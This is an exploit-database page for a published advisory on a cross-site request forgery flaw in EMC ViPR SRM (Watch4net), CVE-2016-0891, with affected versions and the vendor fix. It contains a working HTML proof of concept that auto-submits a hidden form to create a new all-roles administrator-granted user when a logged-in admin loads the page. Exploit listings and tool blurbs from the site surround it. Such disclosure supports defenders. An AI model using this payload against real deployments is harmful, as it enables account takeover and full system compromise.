Menu

Search for hundreds of thousands of exploits

"EMC ViPR SRM - Cross-Site Request Forgery"

Author

Exploit author

"Han Sahin"

Platform

Exploit platform

multiple

Release date

Exploit published date

2016-04-27

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
<!--
EMC M&R (Watch4net) lacks Cross-Site Request Forgery protection

Abstract

It was discovered that EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net.

Affected versions

Versions of EMC ViPR SRM prior to version 3.7 are affected by these vulnerabilities.

See also

- ESA-2016-039
- CVE-2016-0891

Fix

EMC released 34247_ViPR-SRM to fix these vulnerabilities. Please note that this fix is only available for registered EMC Online Support customers.

Introduction

EMC M&R (formerly known as Watch4net) enables cross-domain performance monitoring of infrastructure and data center components in real-time - from a single, customizable dashboard. EMC M&R is a core embedded software technology existing in EMC ViPR, ViPR SRM and Service Assurance Suite.

EMC M&R (Watch4net) does not protect against Cross-Site Request Forgery (CSRF) attacks. A successful CSRF attack can compromise end user data and may allow an attacker to perform an account hijack. If the targeted end user is the administrator account, this results in a full compromise of Watch4net.

Details

Cross-Site Request Forgery (CSRF) is an attack, which forces an end user to execute unwanted actions on a web application to which the targeted user is currently authenticated. With a little help of social engineering an attacker may trick the users of a web application into executing actions (requests) of the attacker's choosing.

The following proof of concept will create a new user named CSRF with password set to 1 in Watch4net - provided that the victim is logged in with an administrator account.
-->

<html>
   <body>
      <form action="http://<target>:58080/APG/admin/form" method="POST">
         <input type="hidden" name="form&#45;id" value="UserForm" />
         <input type="hidden" name="ident" value="" />
         <input type="hidden" name="old" value="" />
         <input type="hidden" name="name" value="CSRF" />
         <input type="hidden" name="password" value="1" />
         <input type="hidden" name="confirm" value="1" />
         <input type="hidden" name="title" value="" />
         <input type="hidden" name="first&#45;name" value="Han" />
         <input type="hidden" name="last&#45;name" value="Sahin" />
         <input type="hidden" name="email" value="attacker&#64;example&#46;com" />
         <input type="hidden" name="role" value="user" />
         <input type="hidden" name="profile" value="0" />
         <input type="hidden" name="user&#45;roles" value="5" />
         <input type="hidden" name="user&#45;roles" value="1" />
         <input type="hidden" name="user&#45;roles" value="3" />
         <input type="hidden" name="user&#45;roles" value="4" />
         <input type="hidden" name="user&#45;roles" value="2" />
         <input type="hidden" name="user&#45;roles" value="6" />
         <input type="hidden" name="filter" value="" />
         <input type="hidden" name="custom" value="true" />
         <input type="submit" value="Submit request" />
      </form>
      <script>
         document.forms[0].submit();
      </script>
   </body>
</html>
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2017-05-01 "HideMyAss Pro VPN Client for macOS 3.x - Local Privilege Escalation" local macos "Han Sahin"
2017-05-01 "HideMyAss Pro VPN Client for OS X 2.2.7.0 - Local Privilege Escalation" local osx "Han Sahin"
2017-03-01 "WordPress Plugin NewStatPress 1.2.4 - Cross-Site Scripting" webapps php "Han Sahin"
2016-07-11 "WordPress Plugin Activity Log 2.3.1 - Persistent Cross-Site Scripting" webapps php "Han Sahin"
2016-04-27 "EMC ViPR SRM - Cross-Site Request Forgery" webapps multiple "Han Sahin"
2015-09-10 "Synology Video Station 1.5-0757 - Multiple Vulnerabilities" webapps cgi "Han Sahin"
2015-03-19 "EMC M&R (Watch4net) - Directory Traversal" webapps java "Han Sahin"
2015-03-19 "EMC M&R (Watch4net) - Credential Disclosure" webapps java "Han Sahin"
2015-03-19 "Citrix Nitro SDK - Command Injection" webapps linux "Han Sahin"
2015-03-19 "Citrix Command Center - Credential Disclosure" webapps xml "Han Sahin"
2015-03-18 "Websense Appliance Manager - Command Injection" webapps java "Han Sahin" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected